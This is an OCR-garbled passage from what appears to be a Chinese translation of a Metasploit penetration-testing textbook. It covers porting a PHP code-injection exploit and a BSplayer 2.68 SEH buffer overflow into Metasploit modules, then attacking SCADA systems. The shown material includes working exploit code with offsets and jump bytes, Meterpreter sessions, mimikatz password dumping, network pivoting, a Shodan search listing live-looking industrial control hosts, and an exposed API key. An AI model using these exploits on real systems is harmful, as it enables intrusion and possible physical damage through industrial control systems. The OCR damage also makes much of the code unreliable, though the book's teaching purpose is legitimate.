在 初始 化 部 分 中 ,我 们 导入 了 所 有 所 需 的 库 文 件 ， 并 列 出 了 模块 的 必要 信息 。 因 为 我 们 要 渗透 的 
目标 是 一 个 基于 PHP 的 漏洞 ， 所 以 选择 的 目标 平台 是 PHP。 因 为 现在 的 漏洞 在 一 个 Web 应 用 程序 中 ， 
而 不 是 在 之 前 的 那 种 软件 程序 中 ， 所 以 要 将 DisableNops 的 值 设 置 为 true 以 关闭 攻击 载荷 中 的 
NOP。 这 个 漏洞 在 ajax.php 文件 中 ， 因 此 要 将 TARGETURI 的 值 设置 为 ajax.php 文件 的 位 置 。 另 外 我 
们 还 创建 了 一 个 名 为 CHECKURI 的 新 字符 串 变量 ， 可 以 用 它 来 创建 检查 方法 。 下 面 是 渗透 模块 的 下 一 























4 





E 























部 分 : 
def check 
send request cgi( 
'method' z» 'POST', 
rg -» normalize uri(target uri.path), 


'vars_post' => { 
'code' => "fwrite(fopen('info.php','w'),'«?php echo 


phpinfo();?»');" 
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) 


resp = send request raw(('uri' => 
normalize uri(datastore['CHECKURI']),'method' -» 'GET'J) 

if resp.body -- /phpinfo()/ 

return Exploit::CheckCode::Vulnerable 

else 

return Exploit::CheckCode::Safe 

end 

end 








我 们 使 用 send request cgi 方法 将 post 请 求 以 一 种 高 效 的 方式 发 送出 去 。 将 变量 method 
的 值 设置 为 POST, 将 URI 的 值 设置 为 以 普通 格式 表示 的 目标 URI, POST 的 参数 copE 的 值 为 
fwrite(fopen('info.php','w'),'«?php echo phpinfo();?>');。o 这 个 攻击 载荷 将 会 创建 一 
个 名 为 info.php 的 新 文件 。 当 代码 执行 的 时 候 ， 这 个 文件 将 会 展示 所 有 的 PHP 信息 。 我 们 还 创建 了 另 
一 个 请 求 ， 用 来 获取 新 创建 的 info.php 文件 的 内 容 这 是 使 用 send request. raw 并 将 method 
的 值 设置 为 GET 实现 的 。 之 前 创建 的 变量 cHECKURI 将 作为 这 个 请 求 的 URI。 


这 个 请 求 的 结果 保存 在 了 resp 变量 中 。 接 下 来 , 将 resp 的 body 部 分 与 表达 式 phpinfo O 进行 比 
较 。 如 果 上 比较 结果 为 true， 就 表示 已 在 目标 主机 上 成 功 创建 了 infophp XPF, Exploit::CheckCode 
: :Vulnerable 的 值 将 会 返回 给 用 户 , 这 将 展示 一 条 目标 主机 存在 漏洞 的 信息 。 否 则 这 个 目标 将 被 标 
记 为 Exploit::CheckCode::Safe, 这 表示 它 是 安全 的 。 下 面 来 查看 exploit 方法 : 


def exploit 
send request cgi( 
'method' 2x "POST. 
"arp -» normalize uri(target uri.path), 
'vars post' => ( 
'code' -» payload.encoded 


} 








AT 





































































































) 
end 
end 


我 们 刚刚 创建 了 一 个 简单 的 Post 请 求 , 在 这 个 请 求 的 code 部 分 包含 了 我 们 的 攻击 载荷 。 当 它 在 
目标 上 执行 的 时 候 ， 我 们 就 可 以 获得 目标 主机 的 PHP meterpreter 权限 。 下 面 来 看 看 这 个 渗透 过 程 。 


her > use exploit/mm/php-belt 
HO 











exploit(php-belt) » set RHOST 192.168.10.104 
ST -» 192.168.10.104 
sf exploit(php-belt) » set payload php/meterpreter/bind tcp 
paytoad => php/meterpreter/bind_tcp 
msf exploit(php-belt) > check 
192.168.10.104:80 - The target is vulnerable. 
msf exploit(php-belt) > exploit 


[*] Started bind handler 
[*] Sending stage (33068 bytes) to 192.168.10.104 
[*] Meterpreter session 1 opened (192.168.10.118:45443 -> 192.168.10.104:4444) at 2016-05-09 15:41:0 


7 40530 
eterpreter » 
heterpreter > sysinfo 
omputer : DESKTOP-PESQ21S 
ps : Windows NT DESKTOP-PESQ21S 6.2 build 9200 (Windows 8 Professional Edition) i586 








Meterpreter : php/php 
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我 们 已 经 获得 目标 的 Meterpreter 权限 , 并 将 这 个 远程 代码 执行 渗透 模块 转换 成 了 一 个 可 以 正常 工 
作 的 Metasploit 渗透 模块 了 。 





Metasploit 已 经 有 了 渗透 PHP utility belt 漏洞 的 官方 模块 ， 可 以 从 以 下 地 址 下 载 这 个 
模块 : https://www.exploit-db.com/exploits/39554/。 


4.3 将 TCP 服务 端 /基于 浏览 器 的 渗透 模块 导入 Metasploit 


我 们 将 在 本 节 看 到 如 何 将 基于 浏览 吉 或 者 TCP 服务 端的 渗透 模块 导 人 Metasploit。 


在 对 应 用 程序 进行 测试 或 者 渗透 测试 时 ,我们 可 能 会 遇 到 因 目 标 软件 在 解析 请 求 /回应 数据 时 失败 
从 而 导致 崩溃 的 情况 。 来 看 一 个 存在 漏洞 的 应 用 程序 在 解析 数据 时 会 发 生 什 么 。 























E CN\Windows\system32\cmd.exe - 36477.py 127.0.0.1 81 [ejm 3 | 





C: Siesreiipeici Desk top> oT py 127.0.0.1 81 
[x] Listening on por 





Open 
http.//127.0.0.1:81 



































示例 所 使 用 的 应 用 程序 是 BSplayer 2.68。 可 以 看 到 , 在 81 端口 上 运行 着 一 个 Python 渗透 模块 。 
这 个 漏洞 源 于 对 远程 服务 器 响应 的 解析 一 一 当 用 户 尝试 从 一 个 URL 处 播放 视频 时 。 试 试 从 81 端口 监 
听 数 据 流 ， 看 看 会 发 生 什么 。 





































i 
E C\Windows\system32\cmd.exe Ha xj 








c: eno Ope Moe op py 127.0.0.1 81 

[*] Listening on por 

("[x] Sending the ers first time', ('127.0.0.1', 49775)) 
('[x] Sending the payload second tine' , (7127.0.0.1', 49776)) 


C:\Users\Apex\Desktop> i| Calculator 


View Edit Help 





| MC I MR | MS | M+ | M- 
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屏幕 上 弹出 了 计算 器 应 用 程序 ， 这 表示 渗透 模块 已 经 成 功 完成 了 任务 。 


可 以 从 https://www.exploit-db.com/exploits/36477/ 下 载 这 个 针对 BSplayer 2.68 的 Python 
渗透 模块 。 





来 看 看 这 个 渗透 模块 的 代码 ， 并 从 中 收集 构建 Metasploit 模块 必需 的 信息 。 














jmplong = 

nseh = "^ 

seh 2 "Ax 00 

buflen = len (buf) 

response = "\x90" *2048 + buf + "\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ "\xcc" * 7000 


c.send (response) 

c.close() 

c, addr = s.accept () 

print(('[*] Sending the payload second time', addr)) 
c.recv(1024) 

c.send (response) 

c.close() 

s.close() 











文 个 渗透 模块 十 分 简单 。 它 的 编写 者 利用 向 后 跳 转 技术 找到 要 传递 给 攻击 载荷 的 ShellCode， 这 
是 一 种 用 于 解决 空间 限制 的 技术 。 还 有 一 点 需要 注意 : 编写 者 向 目标 发 送 了 两 次 恶意 缓冲 区 的 数据 来 
执行 攻击 载荷 ， 这 是 由 漏洞 的 性 质 决 定 的 。 我 们 在 下 一 节 中 将 为 所 有 所 需 的 数据 建立 一 个 表 ， 利 用 这 
些 数 据 可 以 将 这 个 渗透 模块 转化 成 一 个 Metasploit 兼容 的 模块 。 


4.3.1 收集 关键 信息 IUS 
下 表 展 示 了 所 有 必需 的 值 及 其 用 途 。 










































































序 号 t E fü 
1 偏 移 量 2048 
2 已 知 PoP-POP-RETN 系列 指令 /P-P-R 在 内 存 中 的 地 址 0x0000583b 
3 向 后 跳 转 /到 ShellCode 的 长 跳 转 \xe9\x85\xe9\xff\xff 
4 短 跳 转 /指向 下 一 个 SEH 帧 的 指针 \xeb\xf9\x90\x90 
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我 们 现在 已 经 拥有 了 构建 渗透 BSplayer 2.68 的 Metasploit 模块 的 全 部 信息 了 。 可 以 看 到 ， 编 写 者 
将 ShellCode 放 置 在 了 2048 个 NOP 之 后 ,不 过 这 并 不 意味 着 实际 偏 移 量 就 是 2048 一 一 将 它 放置 在 SEH 
覆盖 区 的 前 面 是 因为 必须 要 给 ShellCode 保留 足够 的 空间 。 不 过 我 们 仍然 采用 这 个 值 作为 偏 移 量 ， 这 
是 为 了 严格 遵循 原始 程序 的 设计 。 此 外 ，\xcc 是 一 个 断 点 操作 码 ， 但 是 在 这 个 渗透 模块 中 ， 它 被 用 
来 实现 填充 。 考 虑 到 空间 的 限制 ， 变 量 jmplong 中 存储 了 到 ShellCode 的 向 后 跳 转 。nsen 变量 中 存 
储 了 下 一 帧 的 地 址 ， 也 就 是 我 们 在 上 一 章 中 讨论 过 的 短 跳 转 。seh 变量 中 保存 了 P/P/R 指令 序列 的 
地 址 。 
















































































(Re US EQUUM ed ufu 机 主动 来 连接 我 们 的 渗透 服务 器 ， 
O : MUN 标 服务 器 。 因 此 我 们 的 渗透 服务 器 必须 时 刻 对 即将 到 来 的 连接 
于 监听 状态 。 当 收 到 目标 的 请 求 之 后 ， 要 向 其 发 送 恶 意 的 内 容 。 





4.3.2 创建 Metasploit 模块 
先 来 看 一 下 Metasploit 中 渗透 模块 的 代码 部 分 : 


class MetasploitModule < Msf::Exploit::Remote 
Rank = NormalRanking 


include Msf::Exploit::Remote::TcpServer 


def initialize(info-()) 
super (update info(info, 
'Name' => "BsPlayer 2.68 SEH Overflow Exploit", 
'Description' => %q{ 
Here's an example of Server Based Exploit 


} 


'Author' => [ 'Nipun Jaswal' ], 
'Platform' 2» win" 
'Targets' => 


[ 
[ 'Generic', ('Ret' => 0x0000583b, 'Offset' => 2048} ], 
T 
'Payload' => 
{ 
'BadChars' => "\x00\x0a\x20\x0d" 
} 
'DisclosureDate' => "May 19 2016", 
'DefaultTarget' => 0)) 
end 


到 目前 为 止 我 们 已 经 编写 过 很 多 渗透 模块 了 了 ， 上 面 的 代码 并 无 很 大 差别 ， 唯 一 的 不 同 之 处 在 于 
从 /lib/msf/core/exploit/tep_server.rb 引入 了 一 个 TCP server 库 。 这 个 TCP server 库 提供 了 处 理 传人 请 
求 所 需 的 各 种 方法 和 额外 的 选项 ， 例 如 sRVHOST、SRVPORT 和 SSsSL。 下 面 是 代码 的 剩余 部 分 ; 


def on client, connect (client) 
return if ((p = regenerate payload(client)) -- nil) 
print status("Client Connected") 
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sploit = make nops(target['Offset']) 
sploit «« payload.encoded 

sploit << "WXxcc" * (6787-2048 - payload.encoded.length) 
sploit << "\xe9\x85\xe9\xff\xff" 
sploit << "\xeb\xf9\x90\x90" 

sploit «« [target.ret].pack('V') 
client.put(sploit) 

Cclient.get once 

client.put(sploit) 

handler (client) 

service.close client(client) 


end 
end 


























我 们 并 没有 在 这 些 渗透 模块 中 使 用 什么 渗透 图 数 ， 而 是 使 用 了 on client connect, 





on, client, data 和 on client disconnect 这 几 个 函数 。 其 中 最 重要 ， 也 是 最 简单 的 函数 就 是 











on_client_connect， 在 配置 渗透 客户 端的 SRVHOST 和 SRVPORT 时 就 会 用 到 这 个 函数 。 


我 们 已 经 使 用 Metasploit 中 的 make_nops 函数 创建 了 NOP， 并 使 用 pay1oad.encodeda 将 这 些 NOP 
众人 到 了 攻击 载荷 中 ， 从 而 避免 了 在 攻击 载荷 中 使 用 硬 编码 。 E 和 原始 渗透 模块 相同 的 
变量 sploit 的 剩余 部 分 。 当 需要 时 ， 可 以 使 用 client .put () 函数 将 恶意 数据 发 送 到 目标 ， 这 个 函数 的 








作用 就 是 将 选 



























































先 中 的 数据 发 送 到 目标 。 但 是 这 个 渗透 模块 需要 向 : 标 发 送 两 次 数据 ,所 以 我 们 只 











内 容 来 组 装 


能 在 两 次 发 


送 之 间 使 用 cl ient .get_once 函数 保证 数据 是 分 两 次 发 送 的 ， 否 则 这 两 块 数据 可 能 会 被 合并 成 一 个 单元 


被 一 起 发 送出 去 。 

















service.client, close 关闭 这 次 与 日 标的 连接 。 


可 以 看 到 ， 代 码 中 使 用 了 client 对 象 。 这 是 因为 从 指定 目标 返回 的 传人 请 求 被 看 作 是 一 个 独立 
的 对 象 ， 允 许 同一 时 间 由 多 个 目标 连接 。 


来 看 看 这 个 Metasploit 模块 的 实际 运行 过 程 。 

















msf > use exploit/windows/masteringmetasploit/bsplayer 
msf exploit(bsplayer) > set SRVHOST 192.168.10.118 
SRVHOST => 192.168.10.118 

msf exploit(bsplayer) > set SRVPORT 8080 

SRVPORT -» 8080 

msf exploit(bsplayer) » set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tcp 

msf exploit(bsplayer) » set LHOST 192.168.10.118 

LHOST -» 192.168.10.118 

msf exploit(bsplayer) » set LPORT 8888 

LPORT -» 8888 

msf exploit(bsplayer) » exploit 

[*] Exploit running as background job. 


[*] Started reverse TCP handler on 192.168.10.118:8888 
msf exploit(bsplayer) > [*] Server started. 








如 下 图 所 示 ， 从 BSplayer 2.68 连接 到 渗透 服务 器 的 8080 端口 上 。 


当 数据 分 两 次 成 功 发 送 之 后 ， 使 用 handler 查找 从 渗透 模块 传 回 的 会 话 。 最 后 ， 使 用 
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Üpen 
http://192.168.10.118:8080 

















当 试图 和 渗透 模块 控制 程序 建立 连接 的 时 候 , 一 个 Meterpreter 攻击 载荷 就 会 被 发 送 到 目标 上 ,从 m 











而 产生 如 下 图 所 示 的 结果 。 


[*] Client Connected 

[*] Sending stage (957487 bytes) to 192.168.10.105 

[*] Meterpreter session 1 opened (192.168.10.118:8888 -> 192.168.10.105:49790) at 2016-05-09 23:30:5 
O «0530 











msf exploit(bsplayer) > 











好 了 ! 现在 已 经 获得 目标 的 Meterpreter 命令 权限 。 我 们 使 用 Metasploit 中 的 TCP server 库 编 写 
了 一 个 渗透 的 服务 器 模块 。 在 Metasploit 中 ， 我 们 还 可 以 使 用 HTTP server 库 建立 HTTP 服务 功能 
模块 。 














E3 如 果 想 获取 关于 HTTP 服务 功能 的 更 多 信息 ， 可 以 访问 https://github.com/rapid7/metasploit- 


framework/blob/master/lib/msf/core/exploit/http/server.rb 。 


4.4 小 结 与 练习 


在 经 过 了 大 量 的 渗透 模块 移植 实验 之 后 ， 我 们 已 经 完成 了 将 各 种 渗透 模块 移植 到 Metasploit 中 的 
任务 。 经 过 本 章 的 学 习 , 我 们 知道 了 如 何 轻松 地 将 各 种 渗透 模块 移植 到 Metasploit 框架 中 。 在 本 章 中 ， 
我 们 建立 了 从 独立 模块 中 找到 要 领 的 方法 , 学习 了 各 种 函数 以 及 它们 在 渗透 开发 中 的 作用 ,还 复习 了 
关于 SEH 的 渗透 模块 的 知识 ， 以 及 如 何 建立 渗透 服务 。 

你 可 以 通过 做 如 下 练习 来 提高 水 平 。 

O 从 https://exploit-db.com/ 中 找 10 个 渗透 模块 移植 到 Metasploit。 
口 研究 至 少 3 个 浏览 器 渗透 模块 ， 并 将 它们 移植 到 Metasploit。 
口 尝试 编写 一 个 自 定义 的 ShellCode 模块 ， 并 将 其 移植 到 Metasploit 上 。 

到 此 为 止 , 我 们 已 经 接触 了 大 部 分 的 渗透 模块 编写 练习 。 从 下 一 章 开始 起 , 我们 将 会 看 到 如 何 使 用 
Metasploit 完成 对 各 种 服务 的 测试 ,以 及 如 何 具体 实现 对 各 种 服务 (例如 VOIP、DBMS 以 及 SCADA ) 
的 渗透 测试 。 












































"II 
使 用 Metasploit 对 服务 进行 
测试 








现在 让 我 们 将 目光 转向 对 各 种 专业 服务 的 渗透 测试 。 作 为 渗透 测试 工程 师 ， 你 在 职业 生涯 中 很 可 
能 遇 到 这 样 的 公司 客户 或 者 渗透 环境 : 他 们 仪 仪 需要 对 某 一 台 特 定 的 服务 器 进行 渗透 测试 ， 这 台 服 务 
器 上 可 能 运行 着 数据 库 、IP 电话 (voice over internet protocol, VOIP ) 或 者 监控 和 数据 采集 系统 
( supervisory control and data acquisition，SCADA )。 本 章 在 实现 对 这 些 服务 的 渗透 的 同时 ， 还 要 对 使 
用 的 方法 进行 完善 。 本 章 将 着 眼 于 以 下 几 个 要 点 。 
口 理解 对 SCADA 的 渗透 过 程 。 
C 工业 控制 系统 ( industrial control system, ICS) 的 原理 以 及 关键 特性 。 
口 实现 数据 库 渗 透 测试 。 
口 对 VOIP 服务 进行 渗透 测试 。 

成 功 完成 一 次 对 特定 服务 的 渗透 测试 需要 娴熟 的 渗透 技巧 以 及 对 服务 的 深刻 理解 。 本 章 将 从 这 两 
个 方面 下 手 ， 完 成 对 服务 进行 的 渗透 测试 。 


5.1 SCADA 系统 测试 的 基本 原理 

SCADA 是 一 系列 软件 和 硬件 的 组 合 ， 现 在 已 经 广泛 应 用 在 堤坝 、 发 电站 、 炼 油 厂 以 及 大 型 服务 
器 控制 服务 等 方面 的 管理 中 。 

SCADA 主要 用 于 完成 高 度 专业 的 任务 ， 例 如 对 水 位 的 调度 控制 、 天 然 气管 道 的 输送 、 电 力 网 络 
的 控制 ， 等 等 。 


5.1.1 ICS 的 基本 原理 以 及 组 成 部 分 


SCADA 系统 是 ICS (工业 控制 系统 )， 通 常用 在 一 些 很 关键 的 环境 中 。 一 旦 出 现 问题 ， 将 很 有 可 
能 危及 人 的 生命 。ICS 通常 应 用 在 大 型 工业 生产 中 ， 负 责 控制 各 种 生产 过 程 ， 例 如 按照 一 定 比例 混合 
两 种 化 学 药品 、 在 特定 环境 中 加 入 二 氧化 碳 、 向 锅炉 中 加 入 适量 的 水 ， 等 等 。 


这 种 SCADA 系统 的 组 成 部 分 如 下 所 示 。 








































































































5.1 SCADA 系统 测试 的 基本 原理 139 



























































































































































组 成 部 分 用 途 
远程 终端 单元 这 是 一 种 可 以 将 模拟 类 型 的 测试 值 转换 为 数字 信息 的 装置 。 使 用 最 广泛 的 
( remote terminal unit, RTU ) 通信 协议 是 ModBus 
可 编程 逻辑 控制 器 这 个 部 件 集成 了 输入 输出 服务 器 和 实时 操作 系统 , 它 的 工作 与 RTU 十 分 相 
( programmable logic controller, PLC ) 似 。 它 也 可 以 使 用 各 种 网 络 协议 (例如 FTP、SSH ) 
人 机 界面 这 是 一 个 可 以 直接 观察 或 者 通过 SCADA 系统 控制 的 图 形 化 显示 环境 ,HMI 
( human machine interface, HMI ) ERKKA, IENxGEGDRDBOS—4- 7r 
智能 电子 设备 这 基本 上 就 是 一 个 微 芯片 ， 具 体 来 说 就 是 一 个 控制 器 。 它 可 以 通过 发 送 命 
C intelligent electronic device, IED ) 令 来 完成 指定 的 任务 ， 例 如 在 加 入 特定 剂量 的 某 种 物质 与 另 一 物质 混合 之 

后 关闭 阀门 等 





5.4.2. ICS-SCADA 安全 的 重要 性 





ICS 起 着 十 分 关键 的 作用 ， 一 旦 它们 的 控制 权 落 入 到 不 法 分 子 手中 ， 将 会 产生 灾难 性 的 后 果 。 可 
以 试想 一 下 ， 如 果 天 然 气管 道 的 电路 控制 系统 遭 到 了 恶意 拒绝 服务 攻击 ， 这 可 不 仅仅 会 给 我 们 傍 来 点 
麻烦 而 已 一 一 某 些 SCADA 系统 的 损坏 是 会 要 人 命 的 。 你 也 许 看 过 电影 《 虎 胆 龙 威 4》 其 中 黑客 们 控 





























制 了 天 然 气管 道 ， 这 看 起 来 好 像 很 酪 ; 他 们 还 引起 了 交通 混乱 ， 这 好 像 也 很 有 趣 。 但 在 现实 生活 中 ， 
































一 且 这 种 事情 发 生 ， 将 会 造成 十 分 严重 的 破坏 ， 甚 至 会 夺 走 一 些 人 的 生命 。 


正如 我 们 过 去 看 到 的 那样 ， 随 着 震 网 病毒 ( Stuxnet worm ) 的 出 现 , ICS 和 SCADA 系统 的 安全 性 





遭 到 了 严重 的 侵犯 。 接 下 来 将 讨论 如 何 渗透 进入 一 个 SCADA 系统 ， 
它们 的 安全 ， 以 此 来 共 创 一 个 安全 的 未 来 。 





5.1.3 Xf SCADA 系统 的 HMI 进行 渗透 





或 者 如 何 对 它们 进行 测试 以 确保 

















本 节 将 会 讨论 如 何 渗透 进入 SCADA 系统 。 现 在 有 很 多 可 以 测试 SCADA 系统 的 工具 ， 但 是 对 它 
们 的 讨论 将 会 超出 本 书 的 范围 。 因 此 ， 为 了 保证 本 书简 单 易 读 ， 这 里 只 介绍 以 Metasploit 为 工具 对 














SCADA 系统 的 HMI 的 渗透 。 
1. 测试 SCADA 的 基本 原理 











让 我 们 开始 了 解 渗透 SCADA 系统 的 基本 知识 。 最 近 Metasploit 中 添加 了 很 多 渗透 模块 ， 利 用 这 
些 模 块 可 以 渗透 进入 SCADA 系统 。 然 而 ， 由 于 安全 性 的 进步 ， 在 网 络 上 找到 还 在 使 用 默认 的 用 户 名 
和 密码 的 SCADA 服务 器 已 经 不 太 可 能 了 ,但 这 种 可 能 性 却 的 确 存 在 。 






































目前 比较 流行 的 互联 网 扫描 网 站 是 https://shodan.io， 它 提供 了 在 
功能 。 下 面 给 出 了 在 Metasploit 中 集成 Shodan 的 步 又。 


首先 在 Shodan 网 站 创建 一 个 账号 。 

















互联 网 上 查找 SCADA 服务 器 的 











(1) 成 功 注册 后 , 可 以 在 账户 的 Shodan 服务 中 找到 API 密 钥 。 利 用 这 个 密 钥 , 可 以 通过 Metasploit 


搜索 各 种 服务 。 
(2) 启动 Metasploit， 并 加 载 auxiliary/gather/shodan_sea 











rch 模块 。 
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行 测试 





(3) 将 模块 中 参数 SHODAN_APIKI 
(4) 试 着 使 用 Rockwell Automation 和 





mi 没 定 为 Rockwell, Rtn F 





Ev 的 值 设 定 为 你 所 申请 账 
公司 开发 的 系统 来 查找 SCADA 服务 器 ， 





图 所 示 。 





户 中 的 API 密 钥 。 


这 需要 将 QUERY 参数 





iU 








msf > use auxiliary/gather/shodan search 
Ims£ auxiliary (shodan search) > show options 


Module options (auxiliary/gather/shodan search): 


Name Current Setting Required 

DATABASE false no 

MAXPAGE 1 yes 

OUTFILE no 

Proxies no 
ort[,type:host:port][...] 

QUERY yes 

REGEX .* yes 
/Country/Hostname 

SHODAN APIKEY yes 


msf auxiliary(shodan search) > set SHODAN APIKEY RxSqYSOYrs3Krqx7HgiwWEqm2Mv5XsQa 
ISHODAN . APIKEY => RxSqYSOYrs3Krqx7HgiwWEqm2Mv5XsQa 


Description 


Add search results to the database 
Max amount of pages to collect 

A filename to store the list of IPs 
A proxy chain of format type:host:p 


Keywords you want to search for 
Regex search for a specific IP/City 


The SHODAN API key 











(5) 设置 SHODAN. APIKEY 


I 





选项 和 oui 








ERY 选项 ， 得 到 如 下 图 所 示 的 结果 。 











[*] Total: 4249 on 43 pages. 
[*] Collecting data, please wait... 


Search Results 


IP:Port 
104. 
107. 
109. 
119. 
12.109.102.64:44818 
121. 
123. 
123. 
148. 
148. 
157. 


159.239.246:44818 
85.58.142:44818 

164.235.136:44818 
193.250.138:44818 


163.55.169:44818 
209.231.230:44818 
209.234.251:44818 
64.180.75:44818 
78.224.154:44818 
157.218.93:44818 


City 


Holland 


msf auxiliary (shodan search) > set QUERY Rockwell 
QUERY => Rockwell 
msf auxiliary(shodan search) > run 


Showing: 1 page(s) 


United States 
United States 
Switzerland 

Korea, Republic of 
United States 
Korea, Republic of 
Australia 
Australia 

United States 
United States 
Iceland 


104-159-239-246.static.sgnw.mi.charter.com 
136.235.164.109.static.wline.lns.sme.cust.swisscom.ch 


cas-wv-cpe-12-109-102-64.cascable.net 


vsat-148-64-180-75.c005.g4.mrt.starband.net 
misc-148-78-224-154.pool.starband.net 








的 SCADA 服务 器 。 但 是 你 最 好 不 要 向 这 些 不 了 解 的 ， 尤 其 是 没有 权限 的 网 络 设备 发 起 攻 





我 们 使 用 Metasploit 模块 很 轻松 地 在 互联 网 上 找到 了 大 量 采 用 Rockwell 自动 化 技术 的 、 正 在 运行 





2. 基于 SCADA 的 渗透 模块 


最 近 一 段 时 间 ， 


SCADA 系统 被 渗透 的 寻 




















HE 


o 


HEREHERE SCADA 系统 也 存在 着 各 种 各 样 的 


漏洞 ， 例 如 栈 溢出 漏洞 、 整 型 溢出 漏洞 、 跨 站 脚本 漏洞 和 SQL 注入 漏洞 。 


设备 受到 黑客 攻击 的 主要 原 
我 们 来 看 一 个 SCADA 设备 的 例子 , 并 尝 


此 外 ， 








因 有 两 个 : SCADA F 








这 些 漏 洞 还 可 能 会 威胁 我 们 的 财产 和 生命 ， 这 一 切 正如 之 前 讨论 过 的 那样 。 造 成 SCADA 
发 人 员 在 编程 时 的 玻 忽 


s 试 使 用 Metasploit 来 对 其 


和 操作 人 员 在 控制 时 的 不 规范 。 
进行 渗透 。 在 接 下 来 的 例子 中 ， 
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我 们 将 会 在 Windows XP 上 运行 Metasploit 来 对 一 个 DATAC RealWin SCADA Server 2.0 系统 进行 渗透 。 
由 于 这 个 运行 在 912 端口 上 的 服务 使 用 了 C 语言 中 的 sprintf 函数 , 因此 存在 缓冲 区 溢出 漏洞 。 
DATAC RealWin SCADA server 的 源 代码 使 用 sprintf 函数 显示 一 个 根据 用 户 输 入 构成 的 特定 字符 
串 。 这 个 漏洞 函数 被 攻击 者 利用 ， 就 可 能 导致 整个 系统 的 沦陷 。 
现在 就 使 用 Metasploit 中 的 渗透 模块 exploit/windows/scada/realwin scpc initialize 完 
成 对 DATAC RealWin SCADA Server 2.0 的 渗透 。 这 个 过 程 如 下 图 所 示 。 





























msf > use exploit/windows/scada/realwin scpc initialize 

sf exploit(realwin scpc initialize) » set RHOST 192.168.10.108 

RHOST => 192.168.10.108 

msf exploit(realwin scpc initialize) > set payload windows/meterpreter/bind tcp 
payload => windows/meterpreter/bind tcp 

msf exploit (realwin scpc initialize) > show options 


Module options (exploit/windows/scada/realwin scpc initialize): 


Name Current Setting Required Description 
RHOST 192.168.10.108 yes The target address 
RPORT 912 yes The target port 





[Payload options (windows/meterpreter/bind tcp): 


Name Current Setting Required Description 

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) 
LPORT 4444 yes The listen port 

RHOST 192.168.10.108 no The target address 


Exploit target: 


Id Name 





0 Universal 





A 


这 里 RHOST 的 值 设 置 为 192.168.10.108， 将 攻击 载荷 的 值 设置 为 windows/meterpreter/ 
bind tcp. DATAC RealWin SCADA 所 使 用 的 默认 端口 为 912。 现 在 就 对 这 个 目标 进行 测试 ， 验 证 该 
漏洞 是 否 可 以 被 渗透 。 





























Inst exploit(realwin scpc initialize) » exploit 


[*] Started bind handler 

[*] Trying target Universal... 

[*] Sending stage (957487 bytes) to 192.168.10.108 

[*] Meterpreter session 1 opened (192.168.10.118:38051 -> 192.168.10.108:4444) at 2016-05-10 02:21:15 +0530 


Ieterpreter > sysinfo 


Computer : NIPUN-DEBBE6F84 

los : Windows XP (Build 2600, Service Pack 2). 
Architecture : x86 

System Language : en_US 

Domain : WORKGROUP 

Logged On Users : 2 

Meterpreter : x86/win32 


Ilneterpreter > load mimikatz 
Loading extension mimikatz...success. 


好 了 ! es AA E 接 下 来 载 和 人 mimikatz 模块 来 查找 系统 中 的 
明文 密码 ， 这 个 过 程 如 下 图 所 示 。 
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meterpreter > kerberos 

Not currently running as SYSTEM 
[*] Attempting to getprivs 

Got SeDebugPrivilege 
[*] Retrieving kerberos credentials 
kerberos credentials 


AuthID Package Domain User Password 
0;999 NTLM WORKGROUP NIPUN-DEBBE6F84$ 

0;997 Negotiate NT AUTHORITY LOCAL SERVICE 

0;52163 NTLM 

0;996 Negotiate NT AUTHORITY NETWORK SERVICE 

0;176751 NTLM NIPUN-DEBBE6F84 Administrator 12345 


























当 输 入 命令 kerberos 之 后 ， dA di 形式 保存 的 密码 了 。 我们 将 会 在 本 书 的 后 半 部 分 
对 mimikatz 的 功能 和 其 他 库 进行 详细 的 介 


5.1.4 攻击 Modbus 协议 


大 多 数 的 SCADA 服务 器 都 工作 在 内 部 /和 孤立 的 网 络 上 。 不 过 这 里 假设 一 种 可 能 性 : 攻击 者 已 经 获 
得 了 面向 互联 网 的 服务 器 的 控制 权 , 从 而 可 以 将 该 服务 器 作为 跳板 来 进行 人 侵 。 他 可 以 改变 PLC 的 状 
态 ， 读 取 和 改写 控制 器 的 状态 ， 以 此 造成 严重 的 破坏 。 下 面 来 看 一 个 例子 。 


m 





























hsf post (autoroute) > show options 


Module options (post/multi/manage/autoroute) : 


Name Current Setting Required Description 

CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default) 
NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24" 

SESSION yes The session to run this module on. 

SUBNET no Subnet (IPv4, for example, 10.10.10.0) 


sf post(autoroute) > set SESSION 2 

ESSION => 2 

sf post(autoroute) > set SUBNET 192.168.116.0 
UBNET => 192.168.116.0 

msf post(autoroute) > run 


SESSION may not be compatible with this module. 
[*] Running module against WIN-QBJLDF2RUOT 
[*] Searching for subnets to autoroute. 
Route added to subnet 192.168.116.0/255.255.255.0 from host's routing table. 
Route added to subnet 192.168.174.0/255.255.255.0 from host's routing table. 
[*] Post module execution completed 
psf post(autoroute) > J 


从 上 图 中 可 以 看 出 , 攻击 者 已 经 获得 了 子 网 192.168.174.0 中 的 一 个 系统 的 控制 权限 , 并 且 已 经 添 
加 了 到 达 另 一 个 内 部 网 络 192.168.116.0 的 路 由 。 


接 下 来 攻击 者 将 对 内 部 网 络 中 的 主机 进行 端口 扫描 。 假 设 他 在 IP 地 址 192.168.116.131 上 发 现 了 
一 台 主 机 。 进行 一 次 广泛 的 端口 扫描 显然 是 必 不 可 少 的 , 要 注意 不 规范 的 操作 可 能 会 引起 严重 的 后 果 。 
下 面 来 看 看 在 这 个 场景 中 如 何 进 行 端口 扫描 。 


msf post(autoroute) > db nmap -n -sT --scan-delay 1 -p1-1000 192.168.116.131 

[*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-18 03:56 EDT 

[*] Nmap: Stats: 0:01:44 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan 
[*] Nmap: Connect Scan Timing: About 10.15% done; ETC: 04:13 (0:15:12 remaining) 
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可 以 看 出 ， 前 面 进行 的 扫描 不 是 一 次 常规 扫描 。 i n 来 禁止 DNS 解析 。 参 数 -sT 
ii ors TCP 连接 扫描 , 在 这 个 扫描 中 会 有 一 秘 的 延 时 , 这 意味 着 将 会 按照 顺序 扫描 端口 ,每 次 扫描 
这 次 Nmap 扫描 的 结果 如 下 所 示 。 

















[*] Nmap: Nmap scan report for 192.168.116.131 
[*] Nmap: Host is up (0.00068s latency). 

